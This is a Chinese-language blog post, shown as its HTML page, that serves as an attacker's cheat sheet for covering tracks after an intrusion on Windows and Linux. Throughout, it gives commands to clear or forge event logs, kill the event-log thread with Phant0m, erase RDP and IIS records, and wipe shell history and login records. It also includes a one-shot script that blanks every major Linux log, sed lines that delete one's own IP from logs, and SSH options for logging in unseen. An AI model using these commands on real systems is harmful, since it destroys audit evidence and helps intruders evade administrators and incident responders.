

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://raw.githubusercontent.com/kIl3rr/photo/main/icon.jpg">
  <link rel="icon" href="https://raw.githubusercontent.com/kIl3rr/photo/main/icon.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <meta name="description" content="痕迹清理win日志删除1234567应用程序日志：%systemroot%\system32\config\AppEvent.EVT安全日志：%systemroot%\system32\config\SecEvent.EVT系统日志：%systemroot%\system32\config\SysEvent.EVTDNS日志：%sys temroot%\system32\config，默认文件大小">
<meta property="og:type" content="article">
<meta property="og:title" content="痕迹清理">
<meta property="og:url" content="http://example.com/2022/04/04/%E7%97%95%E8%BF%B9%E6%B8%85%E7%90%86/index.html">
<meta property="og:site_name" content="🗄">
<meta property="og:description" content="痕迹清理win日志删除1234567应用程序日志：%systemroot%\system32\config\AppEvent.EVT安全日志：%systemroot%\system32\config\SecEvent.EVT系统日志：%systemroot%\system32\config\SysEvent.EVTDNS日志：%sys temroot%\system32\config，默认文件大小">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-04-04T05:59:02.491Z">
<meta property="article:modified_time" content="2022-04-04T05:59:58.986Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="knowledge">
<meta name="twitter:card" content="summary">
  
  <title>痕迹清理 - 🗄</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-dark-dimmed.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="/css/macpanel.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.12","typing":{"enable":true,"typeSpeed":90,"cursorChar":"_","loop":true},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":"G-SL9T1KRBQY","gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>👩‍💻</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                Links
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('https://raw.githubusercontent.com/kIl3rr/photo/main/post.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="痕迹清理">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-04-04 13:59" pubdate>
        April 4, 2022 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      4.6k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      NaN 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">痕迹清理</h1>
            
            <div class="markdown-body">
              <h1 id="痕迹清理"><a href="#痕迹清理" class="headerlink" title="痕迹清理"></a>痕迹清理</h1><h2 id="win"><a href="#win" class="headerlink" title="win"></a>win</h2><h3 id="日志删除"><a href="#日志删除" class="headerlink" title="日志删除"></a>日志删除</h3><figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs taggerscript">应用程序日志：<span class="hljs-variable">%systemroot%</span><span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\c</span>onfig<span class="hljs-symbol">\A</span>ppEvent.EVT<br>安全日志：<span class="hljs-variable">%systemroot%</span><span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\c</span>onfig<span class="hljs-symbol">\S</span>ecEvent.EVT<br>系统日志：<span class="hljs-variable">%systemroot%</span><span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\c</span>onfig<span class="hljs-symbol">\S</span>ysEvent.EVT<br>DNS日志：<span class="hljs-variable">%sys temroot%</span><span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\c</span>onfig，默认文件大小512KB<br>Internet信息服务FTP日志：<span class="hljs-variable">%systemroot%</span><span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\l</span>ogfiles<span class="hljs-symbol">\m</span>sftpsvc1<span class="hljs-symbol">\ </span>每天记录<br>Internet信息服务WWW日志：<span class="hljs-variable">%systemroot%</span><span class="hljs-symbol">\s</span>ystem32<span class="hljs-symbol">\l</span>ogfiles<span class="hljs-symbol">\w</span>3svc1<span class="hljs-symbol">\ </span>每天记录<br>Scheduler服务日志默认位置：<span class="hljs-variable">%sys temroot%</span><span class="hljs-symbol">\s</span>chedlgu.txt<br></code></pre></td></tr></table></figure>

<p>以上日志在注册表里的键：<br>应用程序日志，安全日志，系统日志，DNS服务器日志，它们这些LOG文件在注册表中的：<code>HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog</code> 有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面可查到以上日志的定位目录。Schedluler服务日志在注册表中<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent</code></p>
<h4 id="暴力删除"><a href="#暴力删除" class="headerlink" title="暴力删除"></a>暴力删除</h4><ol>
<li><p>eventvwr   自带管理器删除</p>
</li>
<li><p>wevtutil.exe   <code>&gt;=win7|admin</code></p>
</li>
</ol>
<p>获取日志分类列表：</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cmd">wevtutil el<br></code></pre></td></tr></table></figure>

<p>获取单个日志类别的统计信息：</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cmd">wevtutil gli &quot;windows powershell&quot;<br></code></pre></td></tr></table></figure>

<p>查看指定日志的具体内容：</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cmd">wevtutil qe /f:text &quot;windows powershell&quot;<br></code></pre></td></tr></table></figure>

<p>删除单个日志类别的所有信息：</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cmd">wevtutil cl &quot;windows powershell&quot;<br></code></pre></td></tr></table></figure>

<p>所有</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs cmd">wevtutil cl security<br>wevtutil cl Setup<br>wevtutil cl System<br>wevtutil cl Aplication<br>wevtutil cl Forwarded Events<br></code></pre></td></tr></table></figure>

<ol start="3">
<li>powershell  <code>admin</code></li>
</ol>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">Clear-Eventlog</span> <span class="hljs-literal">-LogName</span> Security<br><span class="hljs-built_in">Clear-Eventlog</span> <span class="hljs-literal">-LogName</span> System<br></code></pre></td></tr></table></figure>

<h4 id="破坏日志记录进程"><a href="#破坏日志记录进程" class="headerlink" title="破坏日志记录进程"></a>破坏日志记录进程</h4><p>Windows日志对应于eventlog服务，找到该服务对应的进程svchost.exe，进而筛选出svchost.exe进程中具体实现日志功能的线程，调用TerminateThread结束线程，破坏日志记录功能</p>
<p>特别的地方：</p>
<p>由于只结束了实现日志功能的线程，所以Windows Event Log服务没有被破坏，状态仍为正在运行</p>
<p><a target="_blank" rel="noopener" href="https://github.com/hlldz/Phant0m">Phant0m</a></p>
<p>定位eventlog服务对应进程svchost.exe的pid遍历该进程中的所有线程判断线程是否满足条件 Windows Event Log 服务需要调用wevtsvc.dll，完整路径为<code>%WinDir%\System32\wevtsvc.dll</code> 并且，如果线程调用了wevtsvc.dll，就可以判读该线程实现了日志记录功能结束线程 使用TerminateThread恢复方法 结束进程svchost.exe 重新开启Windows Event Log 服务：<code>net start eventlog</code></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">set-ExecutionPolicy</span> RemoteSigned   Y  <br>或者：<br>powershell <span class="hljs-literal">-ep</span> bypass<br><br>//<span class="hljs-built_in">kill</span> event log<br><span class="hljs-built_in">Invoke-Phant0m</span><br></code></pre></td></tr></table></figure>

<p>mimikatz</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs cmd"><span class="hljs-function">privilege::<span class="hljs-title">debug</span></span><br><span class="hljs-function"><span class="hljs-title">event</span>::</span><br></code></pre></td></tr></table></figure>

<p>msf</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">clearev<br>run clearlogs(仅包含应用、系统、安全三个类型)<br><br>run event_manager  -i<br>run event_manager  -c(六种类型均会删除)<br></code></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://github.com/3gstudent/Windows-EventLog-Bypass">Windows-EventLog-Bypass</a> </p>
<p><strong>IIS日志</strong></p>
<p>IIS默认日志路径：</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs taggerscript"><span class="hljs-variable">%SystemDrive%</span><span class="hljs-symbol">\i</span>netpub<span class="hljs-symbol">\l</span>ogs<span class="hljs-symbol">\L</span>ogFiles<span class="hljs-symbol">\W</span>3SVC1\<br></code></pre></td></tr></table></figure>

<p>清除WWW日志：</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs cmd">停止服务：<span class="hljs-built_in">net</span> stop w3svc<br>删除日志目录下所有文件：<span class="hljs-built_in">del</span> *.*<br>启用服务：<span class="hljs-built_in">net</span> <span class="hljs-built_in">start</span> w3svc<br></code></pre></td></tr></table></figure>

<h4 id="3389登陆记录清除"><a href="#3389登陆记录清除" class="headerlink" title="3389登陆记录清除"></a>3389登陆记录清除</h4><figure class="highlight bat"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bat">@<span class="hljs-built_in">echo</span> off<br>@reg delete &quot;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&quot; /va /f<br>@<span class="hljs-built_in">del</span> &quot;<span class="hljs-variable">%USERPROFILE%</span>\My Documents\Default.rdp&quot; /a<br>@<span class="hljs-keyword">exit</span><br></code></pre></td></tr></table></figure>

<h4 id="清除recent"><a href="#清除recent" class="headerlink" title="清除recent"></a>清除recent</h4><p>在文件资源管理器中点击“查看”-;“选项”-;在常规-;隐私中点击”清除”按钮</p>
<p>或直接打开C:\Users\Administrator\Recent并删除所有内容</p>
<p>或在命令行中输入<code>del /f /s /q “%userprofile%\Recent*.*</code></p>
<h3 id="日志伪造"><a href="#日志伪造" class="headerlink" title="日志伪造"></a>日志伪造</h3><p>使用eventcreate这个命令行工具来伪造日志或者使用自定义的大量垃圾信息覆盖现有日志。</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cmd">eventcreate -l system -so administrator -t warning -d &quot;this is a test&quot; -id <span class="hljs-number">500</span><br></code></pre></td></tr></table></figure>

<h3 id="擦除"><a href="#擦除" class="headerlink" title="擦除"></a>擦除</h3><h4 id="Cipher-命令多次覆写"><a href="#Cipher-命令多次覆写" class="headerlink" title="Cipher 命令多次覆写"></a>Cipher 命令多次覆写</h4><p>在删除文件后，可以利用Cipher 命令通过 /W 参数可反复写入其他数据覆盖已删除文件的硬盘空间，彻底删除数据防止被恢复。</p>
<p>比如，删除<code>D:\tools</code>目录下的文件，然后执行这条命令：</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cmd">cipher /w:D:\tools<br></code></pre></td></tr></table></figure>

<p>这样一来，D 盘上未使用空间就会被覆盖三次：一次 0x00、一次 0xFF，一次随机数，所有被删除的文件就都不可能被恢复了。</p>
<h4 id="Format命令覆盖格式化"><a href="#Format命令覆盖格式化" class="headerlink" title="Format命令覆盖格式化"></a>Format命令覆盖格式化</h4><p>Format 命令加上 /P 参数后，就会把每个扇区先清零，再用随机数覆盖。而且可以覆盖多次。比如：</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cmd"><span class="hljs-built_in">format</span> D: /P:<span class="hljs-number">8</span><br></code></pre></td></tr></table></figure>

<p>这条命令表示把 D 盘用随机数覆盖 8 次。</p>
<h2 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h2><h3 id="清除命令历史记录"><a href="#清除命令历史记录" class="headerlink" title="清除命令历史记录"></a>清除命令历史记录</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">histroy -r          <span class="hljs-comment">#删除当前会话历史记录</span><br><span class="hljs-built_in">history</span> -c          <span class="hljs-comment">#删除内存中的所有命令历史</span><br>rm .bash_history    <span class="hljs-comment">#删除历史文件中的内容</span><br>HISTZISE=0          <span class="hljs-comment">#通过设置历史命令条数来清除所有历史记录</span><br>vim ~/.bash_history <span class="hljs-comment">#删除不想保存的命令</span><br></code></pre></td></tr></table></figure>

<p>利用vim特性删除历史命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#使用vim打开一个文件</span><br>vi test.txt<br><span class="hljs-comment"># 设置vim不记录命令，Vim会将命令历史记录，保存在viminfo文件中。</span><br>:<span class="hljs-built_in">set</span> <span class="hljs-built_in">history</span>=0<br><span class="hljs-comment"># 用vim的分屏功能打开命令记录文件.bash_history，编辑文件删除历史操作命令</span><br>vsp ~/.bash_history<br><span class="hljs-comment"># 清除保存.bash_history文件即可。</span><br></code></pre></td></tr></table></figure>

<h3 id="在隐蔽的位置执行命令"><a href="#在隐蔽的位置执行命令" class="headerlink" title="在隐蔽的位置执行命令"></a>在隐蔽的位置执行命令</h3><p>使用vim打开文件执行命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">:<span class="hljs-built_in">set</span> <span class="hljs-built_in">history</span>=0<br>:!<span class="hljs-built_in">command</span><br></code></pre></td></tr></table></figure>

<h3 id="日志删除-1"><a href="#日志删除-1" class="headerlink" title="日志删除"></a>日志删除</h3><figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs stata">/<span class="hljs-keyword">var</span>/<span class="hljs-keyword">run</span>/utmp 记录现在登入的用户，使用w,who,users等命令查看<br>/<span class="hljs-keyword">var</span>/<span class="hljs-keyword">log</span>/wtmp 记录用户所有的登入和登出，使用last命令查看<br>/<span class="hljs-keyword">var</span>/<span class="hljs-keyword">log</span>/lastlog 记录每一个用户最后登入时间，使用lastlog命令查看<br>/<span class="hljs-keyword">var</span>/<span class="hljs-keyword">log</span>/btmp 记录所有登录失败信息，使用lastb命令查看<br>/<span class="hljs-keyword">var</span>/<span class="hljs-keyword">log</span>/auth.<span class="hljs-keyword">log</span> 需要身份确认的操作<br>/<span class="hljs-keyword">var</span>/<span class="hljs-keyword">log</span>/secure 记录安全相关的日志信息<br>/<span class="hljs-keyword">var</span>/<span class="hljs-keyword">log</span>/maillog 记录邮件相关的日志信息<br>/<span class="hljs-keyword">var</span>/<span class="hljs-keyword">log</span>/message 记录系统启动后的信息和错误日志<br>/<span class="hljs-keyword">var</span>/<span class="hljs-keyword">log</span>/cron 记录定时任务相关的日志信息<br>/<span class="hljs-keyword">var</span>/<span class="hljs-keyword">log</span>/spooler 记录UUCP和<span class="hljs-keyword">news</span>设备相关的日志信息<br>/<span class="hljs-keyword">var</span>/<span class="hljs-keyword">log</span>/<span class="hljs-keyword">boot</span>.<span class="hljs-keyword">log</span> 记录守护进程启动和停止相关的日志消息<br></code></pre></td></tr></table></figure>

<h4 id="全部删除"><a href="#全部删除" class="headerlink" title="全部删除"></a>全部删除</h4><p>清除登录系统失败的记录：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">[root@centos]<span class="hljs-comment"># echo &gt; /var/log/btmp </span><br>[root@centos]<span class="hljs-comment"># lastb             //查询不到登录失败信息</span><br></code></pre></td></tr></table></figure>

<p>清除登录系统成功的记录：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">[root@centos]<span class="hljs-comment"># echo &gt; /var/log/wtmp  </span><br>[root@centos]<span class="hljs-comment"># last              //查询不到登录成功的信息</span><br></code></pre></td></tr></table></figure>

<p>清除相关日志信息：</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs cmd">清除用户最后一次登录时间：<span class="hljs-built_in">echo</span> &gt; /var/log/lastlog          #lastlog命令<br>清除当前登录用户的信息：<span class="hljs-built_in">echo</span> &gt;   /var/log/utmp             #使用w,who,users等命令<br>清除安全日志记录：cat /dev/null &gt;  /var/log/secure<br>清除系统日志记录：cat /dev/null &gt;  /var/log/message<br></code></pre></td></tr></table></figure>

<h4 id="删除-替换部分日志"><a href="#删除-替换部分日志" class="headerlink" title="删除/替换部分日志"></a>删除/替换部分日志</h4><p>日志文件全部被清空，太容易被管理员察觉了，如果只是删除或替换部分关键日志信息，那么就可以完美隐藏攻击痕迹。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 删除所有匹配到字符串的行,比如以当天日期或者自己的登录ip</span><br>sed  -i <span class="hljs-string">&#x27;/自己的ip/&#x27;</span>d  /var/<span class="hljs-built_in">log</span>/messages<br><br><span class="hljs-comment"># 全局替换登录IP地址：</span><br>sed -i <span class="hljs-string">&#x27;s/192.168.166.85/192.168.1.1/g&#x27;</span> secure<br><br><span class="hljs-comment"># 删除当天日志</span><br>sed  -i <span class="hljs-string">&#x27;/当天日期/&#x27;</span>d  filename<br></code></pre></td></tr></table></figure>

<p>一键清除的bash脚本</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-meta">#!/usr/bin/bash</span><br><span class="hljs-built_in">echo</span> &gt; /var/<span class="hljs-built_in">log</span>/syslog<br><span class="hljs-built_in">echo</span> &gt; /var/<span class="hljs-built_in">log</span>/messages<br><span class="hljs-built_in">echo</span> &gt; /var/<span class="hljs-built_in">log</span>/httpd/access_log<br><span class="hljs-built_in">echo</span> &gt; /var/<span class="hljs-built_in">log</span>/httpd/error_log<br><span class="hljs-built_in">echo</span> &gt; /var/<span class="hljs-built_in">log</span>/xferlog<br><span class="hljs-built_in">echo</span> &gt; /var/<span class="hljs-built_in">log</span>/secure<br><span class="hljs-built_in">echo</span> &gt; /var/<span class="hljs-built_in">log</span>/auth.log<br><span class="hljs-built_in">echo</span> &gt; /var/<span class="hljs-built_in">log</span>/user.log<br><span class="hljs-built_in">echo</span> &gt; /var/<span class="hljs-built_in">log</span>/wtmp<br><span class="hljs-built_in">echo</span> &gt; /var/<span class="hljs-built_in">log</span>/lastlog<br><span class="hljs-built_in">echo</span> &gt; /var/<span class="hljs-built_in">log</span>/btmp<br><span class="hljs-built_in">echo</span> &gt; /var/run/utmp<br>rm ~/./bash_history<br><span class="hljs-built_in">history</span> -c<br></code></pre></td></tr></table></figure>

<h3 id="文件删除"><a href="#文件删除" class="headerlink" title="文件删除"></a>文件删除</h3><p>shred</p>
<p>实现安全的从硬盘上擦除数据，默认覆盖3次，通过 -n指定数据覆盖次数</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">shred -f -u -z -v -n 8 1.txt <br></code></pre></td></tr></table></figure>

<p>dd</p>
<p>可用于安全地清除硬盘或者分区的内容。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">dd <span class="hljs-keyword">if</span>=/dev/zero of=要删除的文件 bs=大小 count=写入的次数<br></code></pre></td></tr></table></figure>

<p>wipe</p>
<p>使用特殊的模式来重复地写文件，从磁性介质中安全擦除文件。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wipe filename<br></code></pre></td></tr></table></figure>

<p>Secure-Delete</p>
<p>Secure-Delete 是一组工具集合，提供srm、smem、sfill、sswap，4个安全删除文件的命令行工具。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs awk">srm filename<br>sfill filename<br>sswap <span class="hljs-regexp">/dev/</span>sda1<br>smem<br></code></pre></td></tr></table></figure>

<h3 id="隐藏远程SSH登陆记录"><a href="#隐藏远程SSH登陆记录" class="headerlink" title="隐藏远程SSH登陆记录"></a>隐藏远程SSH登陆记录</h3><p>隐身登录系统，不会被w、who、last等指令检测到</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ssh -T root@192.168.0.1 /bin/bash -i<br></code></pre></td></tr></table></figure>

<p>不记录ssh公钥在本地.ssh目录中</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i<br></code></pre></td></tr></table></figure>


            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%86%85%E7%BD%91/">内网</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/knowledge/">knowledge</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/04/11/%E5%88%9D%E6%8E%A2Docker%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">初探Docker容器逃逸</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/03/31/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/">
                        <span class="hidden-mobile">横向移动</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"lCUF08cIQ1BPgn7X9fjMMTbe-MdYXbMMI","appKey":"RSMbcrKIFnecyMgNGc47g3tN","placeholder":"说点什么","path":"window.location.pathname","avatar":"retro","meta":["nick","mail","link"],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false,"requiredFields":[]},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
